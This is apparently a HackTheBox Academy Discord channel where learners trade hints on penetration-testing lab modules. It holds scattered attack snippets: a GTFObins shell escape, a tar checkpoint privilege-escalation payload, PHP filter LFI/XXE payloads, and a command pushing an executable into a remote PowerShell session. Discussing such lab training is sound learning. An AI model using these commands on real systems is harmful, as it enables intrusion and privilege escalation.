#modules
Very, very doable, if you did CPTS, you already have plenty of modules from CBBH done, so this won't take much time.
I recommend revising and finishing the remaining ones, and going for it once you feel ready (maybe being comfortable with all the modules' skills assessments before jumping into the exam).
CWEE will be harder, but because you have completed most of the CBBH modules, you will have plenty of time to study for CWEE within the one-year timeframe; you just need to put a little bit more effort into it.
i would like to add on that CWEE will have a base assumption that you have a grasp on some programming languages
Very good point, definitely worth mentioning.
Hi, I noticed that the exercise machines for the Attacking Common Applications module are not stable at all, reachable for 2min, unreachable for 5min
it's been going on for 3 days now
hey having some trouble on the SSRF question for attacking enterprise networks - web enumeration & exploitation if anyone is able to help, open to dm
yeah dm
Hey all, I'm just working through the cbbh web proxies module and the zap hud just doesn't work. Just wondering if anyone else has had this issue?
HUD selected, but...no HUD 😦
@jolly oasis please don't spoil content from modules above tier 0. On top of this, please don't spoil flags or flag locations. Have you considered looking at the text file directly?
Sorry. Is this the correct place to post questions about those modules?
Yeah the HUD is a little finicky, no worries though since you can do everything without it, just have to go back to the ZAP ui
Yes it is the correct place, just don't spoil stuff.
Got it
I have finished up Introduction to Windows Command Line and was about to start Introduction to Bash Scripting when I noticed that one of the pre-reqs is Web Requests. the Web Requests module is the last module in the Information Security Foundations. But I also noticed that Web Requests is also a pre-req for a few other modules in the path as well... Is it better to just stick to the order laid out in the path or is it better to do the pre-reqs first?
Do it in the order it's laid out, bash-scripting only has that as a pre-req because of curl which won't be too hard to understand even without going through the Web Requests module
I also noticed that Intro to Network Traffic Analysis and Introduction to Web Applications come before Web Requests as well and both have Web Requests listed as a pre-req. Same advice for those as well?
mhmm
The order it's laid out in is the one that makes the most sense
Thanks for the clarification! It's helpful.
Attacking Thick client applications
cant rdp into target server (getting below error) {using my own vm}
[ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
Gl bro 😭🙏
I had to restart that so many times
Wasn’t even the worst part
i heard from someone about ippsec video on this uk about it?
cant find on yt
This message making me give up already 
It's the box called Fatty
Thank you
Hey yall hoping for a little nudge with "File Upload Attacks - Type Filters"
The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt"
I was able to upload my php file with its content to the server, but when viewing its page, it is returning 404 not found
Nope, not what this discord is about.
@atomic moss Please read the #rules this is not a server for illegal things.
Hi,
I need to use SharpUp.exe for priv escalation. The git repo doesn't have a pre-compiled binary in its Releases section. I had noted down the precompiled-binaries repo under the jakobfriedl account on GitHub earlier. But when I visit the page now, Chrome flags it as dangerous. The repo has got 145 stars which I consider good. However, I am not sure how safe it is to download the executables from here. Are there some other similar repos that are reliable? Or maybe checksums for the files have been maintained somewhere?
Those are tools with lots of signatures, so it will get flagged
this is another repo too https://github.com/Flangvik/SharpCollection
Hello Everyone, I am going through the CPTS path and at Footprint lab - Medium. I could not locate the links myself without any help. Does this happen in real world. Joining the dots was a tricky part for me. Learning was great. Like, I find NfS server, and then enumerating it further, use commands to navigate the files. One of the files has file size of more than 0 Bytes. and so on. Connecting the dots was difficult for me. Not sure if this is how it would be in real world as well. I loved the exercise as well. I might not be able to catch these red flags myself looks like 😦
That's why pentesters work in teams, you finish things much faster, miss less things, and have a more diverse skillset
That being said CPTS is 100% meant to be solved solo
anyone have issue with Windows Lateral Movement module? in particular in the RDP session Im using netexec (nxc) to perform password spray on rdp service but the target machine seems to not respond at all to nxc if I put rdp. with other services like smb it responds but extremely slowly
You are still early in your journey. Your mindset will change over time and these methods will make sense the more you use them until eventually, you can do it a lot from memory.
Don't feel too bad
If you encounter issues with the module pass the hash (pth), when trying to connect to the share \\dc01\david and this fails, check if you can look up dc01 with "nslookup dc01". In my case I wasn't able to find dc01, it probably didn't get spawned correctly. Therefore I couldn't connect to the share. Just reboot the machine and try again.
Thanks for uplifting and motivating me. The journey was looking a bit daunting and unachievable. But by being consistent, sometime should be there. Thanks again 🙂
No worries, even the professionals look things up from time to time as well. It's better to spend the time to look something up and do it the right way instead of fumbling around and wasting time in my opinion.
But then fumbling around can have its benefits too i guess.
Keep on learning 
Yeah for sure. 🙂
Have you started on the hard lab? That one took me a little while to finish
Yeah, i am on it now while we speak
Trying to figure out by referring to previous sections on IMAP / POP3
Nice, thats great.
Taking notes as you go can be helpful as well because you can write it in your own words and it might make more sense to you that way. It can be quicker to navigate to as well, instead of searching through past modules you went through.
Eventually we will need to produce reports as well so having notes to refer to can really help.
Ok do you recommend taking notes on Kali - notepad or something else. Or the host machine . I use Kali on VM
I use the pwnbox provided so i put my notes into notepad on my main OS
Some use things like google drive so that they can access it on any computer with Internet
Hackthebox also has a note tab on the website for each module for students to use
Ok I think I’ll create a GitHub repo to access my notes online as I am also keeping track of what I do other than htb
And use vscode to write down notes in md format
Contact instagram and discord support, can't help you here
doing that module with pwnbox worked it was slow and annoying but yea it worked 
check out gitbook its better for notes taking
Okay thanks so much ! I'll say it to my friend
Good choice 
Ok haven’t heard about that. Will give it a try
Nevermind It's fixed
Need help with Windows Lateral Movement RDP section
Login to the target machine using Helen's credentials. Then, use Pass The Hash to authenticate over RDP to SRV02 with the user you found in the previous question. Read the flag located at C:\Flags\hash.txt. The issue is that SRV02 is unreachable from the target machine once the first RDP connection is established. I performed a ping sweep and found 172.20.0.10 but I cannot connect to that IP and I don't know if it is indeed SRV02, any help?
I followed the instructions in the module to set up the pivot with chisel but the target is unreachable
SOLVED: LAB issue -> restarted and worked well
why have you got local host IP?
IPv4 address = "127.0.0.1" aka Loopback address is your machine IPv4 address, which means it's like pointing a gun towards yourself
show conf
im curious what trying to do 😄
ooooo you are doing proxy chains
but it still points to yourself...
either way I think proxychains doesn't support ICMP, try nc or nmap -sT
Hi all got an issue with cookie-editor in Windows Privilege Escalation - Pillaging. I extracted the cookie via cookieextractor.py but when i go to use cookie-editor in firefox, it's disabled as it could not be verified by firefox. There's no way to enable it and there's no internet access either, can someone help please? Do i have to download it manually , transfer it over and then install it that way? I doubt it but it's the only way i can think of
Looks like you're using private mode
try using normal
yeah just double checked, proxychains only supports TCP and DNS, ping is ICMP so it's not supported
I'm not, i can see why you think that due to the mask being on the right of the title. Here's a full screenshot so that you know i'm in normal
hello i am working on the PENTEST IN A NUTSHELL module currently at the LINUX PRIVILEGE ESCALATION section. Here you get your first example of how to break out to a root shell by using GTFObins
it is executing the reset; /bin/bash 1>&0 2>&0 command but its not entering a root shell.
it's been stuck here for a good 20 minutes now, same thing happened yesterday that's why i thought i try it again today
is the execution supposed to take this long ?? or is this a vm error ?? or did i mess up somehow ?? anyone has any idea ?
nevermind i figured it out... good now
which part is that @near orchid I am on shared libraries section
Hi everyone! I'm working on the Linux Fundamentals module (Table: Shell - System Information), and I'm stuck on the question:
"What is the name of the network interface that MTU is set to 1500?"
The command ip link show shows ens3 has an MTU of 1500, but the answer is marked incorrect. I've also tried enp0s3, 2, etc.
Has anyone encountered this issue? Is there a trick to this one?
Thanks in advance!
Hi guys, I think I need help!
I'm on "Using Web Proxies", now on the "Proxy Setup" stage, but I am having issues with getting ZAP's certificate (as well as its newest version). I managed to install the CA Certificate for Burp, but I got something different than what is shown in the lesson.
I am trying this in a VM separate from HTB, on my own pc.
Any kind of help is appreciated!
(please correct me if I am missing some information to provide 😅)
imo it's just faster to use ZAP's pre-configured web browser, you'll see it in the top menu of the UI it's the firefox icon
are you SSHed to the target
I think I've been there already, now that you mentioned it, I just opened firefox separately on its own, instead of through ZAP!!
I got kind of lost half way through and I tried to realise where did I go wrong.
Thank you a lot, I will try again from there!!! (I'll get back if I still have issues 😭)
Did you get your answer ?
Sorry wrong guy
is something I did wrong I can see sudo -l can do /usr/bin/openssl but the instructions are targeting apache2 web server
Did you get your answer?
all good
Because the lab is not exactly the same as the instructions, you gotta think what you can do to find a way to use that privilege to privesc
hint: ||Look it up in GTFObins||
indeed im checking the config file in /etc
of ld.so.conf but when I get stuck I check that hint you dropped
I don't see the section with "Dynamic SSL Certificate" and I've tried going through the ZAP's browser instead this time.
I can get the Burp Certificate, but ZAP's one is not showing...
File Upload Attacks When crafting my payload to try to bypass filters, It seems like I'm breaking my files in general when uploading, not being able to use the shell. Any idea on what I'm doing wrong?
Hey fam, how can I brute force while changing the IP address in the X-Forwarded-For every N requests in Burp Suite?
I think I managed to do it manually, should be solved
I was sort on the right track 😄
try another extension
Yeah I'm still stuck at it, realized if I add .jpg or any file type it'll break the code right?
So I need to try to make it a php extension + bypass another way
Just kinda stuck.. module doesn't explain very well
what's the topic in file upload?
Bypassing Filters > Type Filters
What I've discovered. Extensions "pgif, phar, pht" are working.
But, when fuzzing all content-types it's still giving "Only images can be ..."
Yeah def is tricky
I've tried the GIF8 trick too, obv i thought I was lucky, but only broken code uploaded lol
did you try to send all the extensions?
You probably used the intruder already to fuzz, but try to experiment with the extensions on the repeater to see which one uploads successfully
I've fuzzed Content-Types which truly isn't doing much for me
I did try extensions, seen which ones allowed "Only images" vs "Not allowed"
So basically any image content-type extension will work? starting to think so
I'm saying this cause i don't think it's a spoiler, but in the function you can see that it allows jpeg, jpg, and png, you are on the right track
Hey guys,
even if its obvious and a easy task, I need some hint regarding:
Skills Assessment - Using Web Proxies
Q1 the Button.
Way 1
I did it manually, created a POST request out of the source code, as parameter (which is wrong) and as data (which is correct)
-> Flag not found
Way 2
I did a F12 in firefox and set the disabled button to false, the POST req appears in BURP, but even after several tries I just see the POST req, but no flag either.
Way 3
Burp intruder with a random header, tried the POST req 100 times, no luck. Even with CURL as User-Agent.
Way 4:
Took the Burp Req in Curl, same. No Flag.
Can someone hint me the single option I am missing out here? Thanks in advance
the fact that you can upload doesn't mean that it can run php
you have to find the extension that can execute php
Hmm okay, I re-fuzzed and grabbed the 5 extensions that might work. I'll try that.
So I've tried .pht, .phar, .phtml, pgif. phtm for extension types, and still returning "Only Images". I'm not sure man, I'll go ahead and re-do the entire module because this one makes no sense lol I appreciate trying to help 🙂
Even if Im not that far like you buddy. I did a quick check, while waiting for my answer. You need a file extension for running code. I just see one from your examples. One can run code, regarding my google result.
Hi Everyone, I’m stuck on trying to crack the hash file of the keePass DB in the Password Attacks Lab - Hard. I’ve tried the list provided in the resources (both the Password.list and the mutated list made with custom.rule) but nothing works. Could someone please point me in the right direction or are we expected to use rockyou.txt and wait forever?
I also tried password.list with best64.rule but it also didn’t work SOS 🫠
So the file must have two extension types?
You wrote your 5 extension types, I only see one extension which is "executable" and should not return as an image, when the content is appropriate.
You may want to google filextension: xyz reverse shell, then I found a one liner. that may work. But as said, I'm not that far with the content.
Thanks man, I think my issue is I try to stay only inside of what's in the academy. I don't like taking google as answers etc as that will be unreliable for the exam yk
I honestly finish it with the content on the module
"We see that we get a message saying Only images are allowed. The error message persists, and our file fails to upload even if we try some of the tricks we learned in the previous sections. If we change the file name to shell.jpg.phtml or shell.php.jpg, or even if we use" quoting the type filter sections
the php code will only be executed if you are using the right php extension for this
Yea ill just come back to this tomorrow I'm already frustrated. tysm for help. this module is getting my first 1 star 100%
I've read this module multiple times, I just am not getting it. Time to call it quits for the day
Strange, mut_password list should work here. DM me if needed.
Nvm, thanks everyone for the help. Indeed got me further to my issue.
The frustration this gives me sometimes... 
@vestal fable & @tepid crane ❤️ tysm
yo nice, glad to help 😄
What's annoying was how close I was
But I went too deep not thinking I needed 2 extension types (.jpg.xxx)
thanks 🙏
may I ask for help/hints here, I tried to cover up my mistakes to improve.
i have been slamming my head against my desk with the section #2 in windbg intro module skills assessment. I have done everything else. I have malware analysis experience and flew through malware analysis and maldoc, and i have been stuck on the middle 2 question in windbg skills assessment. 
Can anyone give a hint regarding Advanced XSS and CSRF Exploitations - XSS Filter Bypasses task
What module?
Advanced XSS and CSRF Exploitations module
pls can someone help me write exploit for the postman lab for root access, i tried many walk throughts, videos but still i cannot get in.
Can anyone explain the process of setting a double pivot through only metasploit? AEN seems to suggest that in order to double pivot the user must upload a rev shell to the 2nd pivot host thorough the 1st pivot's meterpreter connection.
NTLM Relay Use Cases Module
world writable and readable and access denied?!

It's a permission issue for respected .txt file to be submitted. I've done the same thing via multiple routes
I suppose I can skip and continue and read the files later but
Hey, I just started AD Enumeration & Attacks - Skills Assessment Part I can anyone guide me why I am unable to move directories in web shell and when I upload my own payload it gets uploaded But I am unable to execute it
Finally worked my way through web requests now onto the good stuff 🤙🏻
anyone experiencing problem with sqlplus in footprinting Oracle TNS section ? Is there any other way to install this without signing up for an account at Oracle first? Edit: Got it figured out, for future reference: run this script and implement the fix in the module afterwards:
sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y
wget https://deb.parrot.sh/parrot/pool/non-free/o/oracle-instantclient-devel/oracle-instantclient-devel_19.6.0.0.0-0parrot2_amd64.deb
sudo dpkg -i oracle-instantclient-devel_19.6.0.0.0-0parrot2_amd64.deb
Hello, I want to start with "Hack the box" but I don't know anything, I will start from 0. Can anyone give me some tips on how to start in this world?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@devout orbit Please don't post content from modules above tier 0. Simply ask your question with words.
Is this available somewhere in Spanish? (I'm from Spain)
I don't believe so
Yes, I try with chrome and they give me the option to translate the website to spanish 🙂
oke, I will in the future, but can you confirm that machine is not working as expected?
It worked fine when I did it, but it's been a long time and something could have broken. Every single time I thought something was wrong I found out I wasn't doing it right, so I would wager it's probably working as intended.
I am able to make the dll file appear in the Windows cmd line for the RDP and SOCKS Tunneling with SocksOverRDP section of Pivoting, Tunneling and Port Forwarding by adding exclusions but it still won't successfully run the cmd the sections says to run on the file whether I add exclusion for the one file, both folders, the whole desktop, or all of the above.
I have a screenshot but I'm scared it will spoil content.
of the Windows error
this one section has taken me three days
someone tried to help me but the first instruction he gave won't work
hi im new just looking for advice
can someone help me? the guy helping me says he doesn't even think this section is necessary
start with InfoSec Foundations
or the other prerequisite path
to then go into CBBH or CPTS or CDSA depending on which prerequisite path you did
I recommend InfoSec Foundations > CPTS to learn basics
then go elsewhere from there
I know its not him because the advice he gives always is good advice. He and I agree that this section is BS.
can someone help me with this?
I literally followed along with his instructions and it won't work
which one is the best cert
Depends on what you want to do
if you want to do network pentesting then do InfoSec Foundations path and then do CPTS then CAPE to start
but if you want to do web app pentesting then InfoSec Foundations > CBBH > CWEE
if you want defense then do the defensive security prerequisite path then do CDSA
those are the places to start
ok thanks
InfoSec Foundations > CBBH > CWEE is better if you want to do bug bounties
CPTS is also good if you don't know which cert you prefer but do InfoSec Foundations path first
then if you want to transition into web then CBBH could be next after
can someone help me with this?
Hi everyone, question about "Abusing HTTP Misconfigurations": "Tools & Prevention" (CWEE path)
The question says "[...]identify an HTTP Header[...]"
What kind of response are we expecting? A flag? A header? Just the name of the header or the full header?
is defender removing the dll?
yes until I add exclusions for the file, both folders I copied over, AND the Desktop, and even then it gives me an error if I try to run regsvr32.exe on the program
like it won't allow it
but adding exclusions can make the file appear in cmd prompt under dir command
but that's as close as I can get it
try turning off defender
ok
I disabled real-time protection to turn off Windows defender but it still won't work
that error code means access denied iirc
are you able to open as admin
The cmd line? I think so yes but I already tried that
Can anyone help me with the "Automating Payloads with Metasploit" module? My nmap scan shows that several services are open including SMB. How do I know which SMB exploit I should be using? There are nearly 450 different ones when I search for "smb" in Metasploit.
SMB version numbers, OS version/update level, nmap vuln scan.
Please make sure not to post content from modules above tier 0 guys
@cloud urchin did you delete my post? what rule did I break? what about my post broke the rule?
Infosec is information security right?
Technically yes but that learning path is supposed to be prerequisite IT skills for the different cybersecurity pathways
So but I mean that’s why its called “foundations”
But yes it focuses on InfoSec
Ofc is in the hackthebox I got it
Yes I did. You can't post content from modules above tier 0. As the pivoting module is above tier 0 and you posted a screenshot from the module as well as revealing other details I deleted it.
can you define "Content"?.. I was told you can post ss just not information that reveals commands, flags, etc. which I didn't. I asked a question and provided screenshot showing I couldn't connect to .155
I can post the same question without the screenshot showing i couldn't connect to .155 then?
con·tent
/ˈkäntent/
noun
noun: content; plural noun: contents
the things that are held or included in something.
ok pepega
Your screenshot showed the VM from the module, the username, IP address, items on the desktop, etc
Anyone who has done the modules should be able to assist without you needing to post screenshots etc., so it's really not needed
you can just articulate the module, section, what you've tried, etc without posting content
i need a little help here. i'm doing the footprinting skills assessment- easy. i have to edit the vsftpd.conf file for anonymous access and get the flag?
Cant recall but am pretty sure you dont need to edit any confs for that SA
yeah sure
Hi guys
currently revisiting SSRF module and need help on the identifying ssrf part. I've identified some open ports, so for example if one is the mysql port, how exactly can I access this?
this is what I'm getting
and since SSRF makes requests internally, I don't think I could use command line to access mysql on this server
@mighty matrix Please take care not to post content from modules above tier 0
sorry about that I dont know how that all works 😅
as im following the cbbh path it doesn't show any tiers
well Im getting an error message when I try add localhost:port in burp repeater, it's a different error message so it definitely exists but i think I may have forgotten something...so any tips in the right direction will be helpful
It shows the tier when you start the module
ah okay
for the footprinting skill assessment-easy i think i'm heading in the right direction...i just need help understanding the data that i'm getting back from the audit, i'd appreciate it if i could share a screen shot with someone?
thanks
pm
someone here new ?
you
😆
Hello everyone, I have a question regarding the CPTS report template from the module on Documentation and Reporting.
The module advises against duplicating findings within the report. However, in the provided demo report, the Attack Path section outlines the full path the attacker took to compromise the network, which includes vulnerabilities such as:
LLMNR/NBT-NS Response Spoofing
Weak Kerberos Authentication (“Kerberoasting”)
These same vulnerabilities also appear again in the Findings section.
Could someone clarify how to handle this? Should these vulnerabilities be mentioned in both sections, or should they only appear once?
local is used because you're using files on your local machine; so you're telling impacket to not attempt a connection
otherwise if you do have valid admin credentials; you can use secretsdump to remotely dump that info
@silent prawn please re-post without spoiling contents from the module. especially a skill assessment.
Hello, can anyone give me some advice?
Module: Advanced XSS and CSRF Exploitation
Section: Skill Assessment
Question:I tried uploading an HTML snippet that automatically triggers a request to the role-assignment endpoint when the file is opened. Although I can see the request fire in my browser’s network logs, my account’s role never changes—as if the bot didn’t open my file. What might I be overlooking?
Thanks in advance!
Yeet
hi everyone i'm on the academy intro and the question is on the tier 0 module how many cubes are you rewarded for completing. I know the answer but it's not accepting it. I tried number and i tried writing the number in words. module 15 section 34.
If it is not being accepted it is highly likely that it isn't the correct answer, especially when you have double-checked for any leftover space characters
Thanks dpgg I thought so too but I'm literally looking at the cheat sheet so I know the answer is right. Can i put the answer here as on the question has a cheat sheet, it's not really a secret
Hello everyone, I am facing issue with file upload exploitation. I was able to upload PHP/phtml web shells to /files.php(web) however I can't locate the actual execution path. Developer tools & burp suite didn't help. Tried FFUF to brute-force paths but no luck. Also trying to get SSH access to remote host. SSH is open (unfiltered) but I don't have credentials. No success with hydra brute force. Any help, pointers would be greatly appreciated.
It is a tier 0 module, so go for it
the answer is supposed to be zero. the cheat sheet says the cost is 10 cubes and reward is 10 cubes. I've tried answering 10 cubes, i tried 0, zero, ten. I'm stuck
It is looking for a number, not 2 bananas, 3 pineapples, etc.
thank you that did it, thanks a million
Hey everyone,
I'm currently working on the Attacking Enterprise Networks/Web Enumeration & Exploitation module on HTB Academy.
When I spawn the target, I can access the main page at inlanefreight.local, but none of the expected subdomains (like blog.inlanefreight.local, careers.inlanefreight.local, etc.) are reachable. Because of that, tools like Eyewitness also fail, and I can't collect any flags.
Is this a known issue or am I missing something in my setup?
Would really appreciate any help or pointers!
Thanks!
you'd need to add the subdomains to your hosts file as well
@fathom pendant thanks. that was the problem 👍
i suggest continuing through the module blind; not reading the questions or material.
- The questions are leading
- The module itself is a walkthrough
save flags you find, and fill in where appropriate
is nmap able to perform netcat and wait? i just find it awkward that sometimes that i have to connect with netcat on the side and wait to get answers/flags.
i've already tried the --initial-rtt-timeout at 120s and it doesn't show anything compared to just doing nc
What do you mean perform netcat ? nmap and netcat although both interact with network interface ports work in fundamentally different ways
guys im tweaking on API attacks skill assessment, may I request a hint?
|| I've tried bruteforcing the password reset security questions for the five emails with a wordlists of colors if it's worth anything||
try whoami? 
- UDP port seems to be closed AFAIK, unless it's another one :/
- For future reference, are module spoilers not allowed even in spoilers? Just to make sure I don't do it next time
For the hard lab, everything they explained in the Firewall and IDS/IPS evasion section helped me get the flag
That's where I've been guiding myself from, and it has worked wonders so far, just missing the last ||banner grabbing|| part...
I suppose I'll keep at it, thank you all for your time and effort :)
Hi
No problem, the way to get the answer is literally staring you in the face 

Can you tell me what is this server about
This the discord server for the hackthebox website
I mean yeah but what do you all talk about actually
This section is #modules where people that are going through the htb academy come for nudges on modules when they are struggling
Man you talk like a bot
Thanks
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
That's both recomforting and frustrating 🫠 Thanks though, appreciate the tip! :]
Have you found the port you need the banner for?
Well... yeah, I believe so
Even still, ||netcat returns permission denied|| upon trying to connect to it :/
How to know wifi password
What is the nc command you are using? Think about what you did to get the port to show as open in nmap and use that method with nc
- module is above t0
- It's a skill assessment
netcat requires sudo to bind to ports <= 1023, as those are reserved ports
this channel is for discussion of the academy learning modules; https://academy.hackthebox.com
if you want access to more of the server there's instructions in #welcome that contain instructions to link your htb account to the discord to access
and yes, it's how you gain access to #general
- Okay, I see, sorry about the other messages then... I'll make sure to not 😅
- Oh... well, that's slightly embarrassing, it really was staring back at me in the face, didn't think it would be that type of permission denied...
Even so, that was exactly the missing piece and now the module is finally complete, thank you so much dizewo and MarcieLee for your time (and patience!), and I hope everyone has an awesome day! :]
No problem, enjoy your journey
I'm trying to connect using OpenVPN, but I'm getting stuck during the connection process.
Has anyone else run into this recently?
Never mind — it's working now!
Bumping this as it got buried. Any help? The module expects an answer but the question doesnt specify what. Or should I assume every answer is a flag?
The answer is not a flag, but rather something produced in the output of the tool
thanks! I'll search in that direction
just takes sometime for it to establish connection 😄
dm me
Hey Guys, I am doing assessment 1 of active directory enumeration and attacks and I am stuck in question 5
Find cleartext credentials for another domain user submit user as answer
I have no idea what user it is talking about and In Ms01 machine I am able to access due to ps session inside metasploit shell but not able to list or navigate directories
So my main question is how can I get proper shell in ms01 machine which I am connected to via ps-session inside a metasploit shell
I am about to ask a very stupid question but doing Network Enumeration with Nmap Host Discovery section. In the final question it asks to detect the Operating System, is it the operating system of our HTB Virtual Machine or of the IP address given in the final the lab lectures? I did get the operating system of my HTB VM but it keeps saying it is wrong and of the lab lectures still working on it
You are supposed to tell os of target (IP given) host
Dear all, I have a question concerning the module "Pivoting, Tunneling, and Port Forwarding", Section "RDP and SOCKS Tunneling with SocksOverRDP": The question states " Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop." I can successfully connect to the pivot host, however the target is not online. I performed a Ping Sweep (from the pivot host) for 172.16.5.0/24 and 172.16.6.0/24. This identifies two machines (172.16.5.19 and 172.16.5.150 [i.e. the pivot host]). The credentials don't work in either of them.
Has anyone experienced this issue? Any hints? Thanks!
Hi thanks for, we have to tell the OS for the given host like "Linux" but is the IP address given the same one as the lecture notes?
while going through modules there are certain RFC mentioned for the services and protocols do we need to go through them ?
what is in general the best approach to read and learn from RFCs i mean they are very lengthy
observe the nmap results
if u need a hint lemme know
no u r supposed to tell the host which is getting scanned with nmap
Hello, can anyone give me some advice?
Module: Advanced XSS and CSRF Exploitation
Section: Skill Assessment
Question:I tried uploading an HTML snippet that automatically triggers a request to the role-assignment endpoint when the file is opened. Although I can see the request fire in my browser’s network logs, my account’s role never changes—as if the bot didn’t open my file. What might I be overlooking?
Thanks in advance!
ah ok, i will double check since i thought the question is "find out which operating system it belongs to"
idk but my senses tingling i confused you 😭 lemme know if u get the answer lol
I think I got it by checking out the TTL and I think I did not need to even use the VM instance
sorry noob here but wont be for long
thanks for the help @wooden seal
its not noob it was same experience for me too haha
i think u should dlt this as it discloses info to answer
no problem 
is there a reason why it is not possible to get to that hidden directory in
https://academy.hackthebox.com/module/144/section/1311
i am trying to get an answer to this question:
What is the API key in the hidden admin directory that you have discovered on the target system?
when curling it just responses me with 301
nvm, i just forgot extra slash
Ok, figured out my issue. Double hop
In the Weak Permissions section in Windows PrivEsc module https://academy.hackthebox.com/module/67/section/628 i cannot run SharpUp.exe because it uses .NET 3.5 and the machine doesnt have it
Hi everyone!
I'm currently working on the XSS Filter Bypasses section and, like others in this thread, I'm running into some challenges.
I managed to find a way to execute JavaScript, but it seems that the code runs in a restricted context — something referred to as a unique opaque origin. Because of this, the script isn't able to access resources like home.php or admin.php.
If anyone is willing to point me in the right direction or offer a hint, I'd really appreciate it. Thanks in advance!
Anyone?
Hello
Haven’t you got a meterpreter session? Should be good enough
Cross-Site XSS module?
No no, let me explain first I was given web shell which was not interactive I managed to upload my payload there and get meterpreter shell which was stable and allowed me to move directories but Now I want to access another machine which I can do with Ps-Exec but that is very unstable and does not allow me to execute commands properly so that's what I am asking is there any way to upload my payload into another machine?
Have you done the pivoting module?
No, That's why I am here asking for help
You can use MSF autoroute with MSF proxyserver and run commands via proxychains
Or chisel
Or Ligolo
Thanks for the path I will test this now
not possible can not drop any files into Ps-exec session
Search for pivoting and tunneling articles
I think this worked
You can, actually
If you declare a PSSession and then run the Copy-Item cmdlet with -ToSession flag
Hi guys, I've joined just moments ago, I'm a newbie in the community anyone wanna tell me what to do like the first thing i should do to get started
It’s best to research pivoting first
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Tried that it just repeats the command and does not copy
see the article above
Okk
command like this na- Copy-Item "C:\virus1.exe" -Destination "C:\Users\svc_sql.INLANEFREIGHT\Documents" -ToSession $Session
?
Have you checked it inside the host?
Try transferring to Public
how can I? it just repeats whatever command I type like I type dir it also echos dir
It’s worldly readable and writable in default config
Okay, I will try it
You enter your PSSession and check the directory
That's the main problem due to shitty PsSession I can not do anything nor list of directories nor move or run cd command
In a partially interactive session as the one you have, you won’t see the transfer status
It should basically echo the command you ran
If you were inside the Host in a proper PowerShell session, it would display the status
but how will I be able to use the tool even if it reaches the host? because it reflects back my commands and only a few commands like whoami and pwd work
Did you run Get-Command in your PSRemote Session to see what you’re allowed to run?
Also, you can try Invoke-Command to run commands remotely in a PSRemote Session
it just echos back the Get-Command and does not give any result
Okay I will try that
You can try transferring your caller and run it via Invoke-Command
Thanks, I will test these
Just one more question After I am done with ad module. I should start password attacks or pivoting module? (AD was my first htb module)
Advanced CSRF & XSS Exploitation. Do you happen to have any hints on this?
Idk what’s your level of knowledge
I went through all the basic stuff prior to getting to the more intermediate and advanced content
I actually made some progress but I am facing some issues with the SOP / CORS
I have just completed Red teaming path from try hack me (which was a waste of time)
okayy
But I’d go through the basics and construct a good foundation
If those 2 are the choices, Pivoting most definitely
Thanks for the suggestion
What do you recommend the best user and password lists be for the password attacks module on the CPTS track? This might be a lot of waiting..
I think you have a resource to download passw and user list
BTW, I found the Skills Assessment for this module easier than this particular section
I agree
Skills Assessment was a breeze
Can I DM you for a nudge? I am feeling that I am really close to the solution
Hey all! 👋
I'm working on the Skills Assessment for "Information Gathering - Web Edition" and I'm a bit stuck. I don't want to post any spoilers in the channel...is there anyone here I can DM about it? I imagine it's probably just a simple thing that I'm missing 🙂
Ahh I figured it out haha. Nevermind! 😅
hey im a little stuck on ffuf, im not getting any returns on my attempts and im not sure if im doing this right, im specifically trying GET request Fuzzing
can you ping the target, is domain name in /etc/hosts
doesnt seem like it, i am able to do recursive fuzzing to find the address tree but i just get errors when trying to GET request anything
Can I see then cmds you're running, you can also DM me to avoid populating this channel
Hi! Can you help me? The VPN connection is fine, but there is no connection to the machines and ping nmap commands are not working. my MTU is 1500. How to solve this problem?
sorry im forwarding cuz too tired to type it from scratch
someone have done the attacking enterprise network i am on the last question of external information gathering and none vhost seems to work so i guess the ...oh maybe i need to dig
the other host ?
Hey
hey
jsut to reply to myself i forgot or misspell the vhost
@worldly dirge don't reveal module content for modules above tier 0 =_=
man, this brute forcing in password attacks is for the birds. There must be something I over looked ... lol
Don't attack ssh
I guess i'm confused. We're not supposed to brute force SSH?
I'm on the setting up module and I can't get the Windows VM back. Could someone help me understand how to get it back?
step 0; enumeration
the link they have no longer exists, you're better off just creating a vm using rufus to make the iso
okay thank you
does the username start with C ?
?
nvm
i'm gonna take you a step back; enumeration in this context == scanning the target
This module (and a few others) tend to give you the end step but don't necessarily tell you how to get to that info
gotcha, I think I know where this is going.
Note: In order to complete the challenge questions, be sure to download the provided wordlists from the Resources at the top of the page Bruh...I totally did not see this at the end of the lesson...now I can do wtf I need to do lol
instead of scanning with wordlists that would take days to finish lol
Anyone completed the new Hashcat Mission?
Good evening, I'm doing the Vulnerable Services portion of the Windows Privilege Escalation module but for some reason after executing the PoC script it's giving a reverse shell for htb-student instead of SYSTEM
nvm, got it
Guys can someone help me to understand why the privesc on Pandora box via ||tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/***** (asterisk and --checkpoint-action=exec=sh shell.sh)|| doesn't work?
TY, sorry about posting wrong channel
no worries
footprinting easy assessment. i have my keys, i've moved them, ive chmod them. still getting permission denied (publickey) what have i missed?
i did get a bad permissions from the id_rsa
Quick question about PHP filters in LFI vs XXE (CBBH)
Payload from the LFI section:
php://filter/read=convert.base64-encode/resource=config
Payload from the XXE section:
php://filter/convert.base64-encode/resource=index.php
Now my question is why does one need read= and why does one need .php appended to the file?
Note that I'm not familiar with PHP so you may need to explain like I'm 5, thank you! 🙂
Do lab machines require a VIP or even though I don't do tier0 am I able to access some?
Academy is the educational platform with HTB. You can unlock content there by purchasing cubes or having a subscription that unlocks them. VIP is part of the platform that offers the various boxes etc. It's separate.
I think the only thing VIP+ gives you on Academy is time on the pwnbox.
Currently have the student, but been considering the labs as well
😂
lol
The reason I asked is because I hopped on yesterday and noticed a couple of open machines but they did not require the VIP
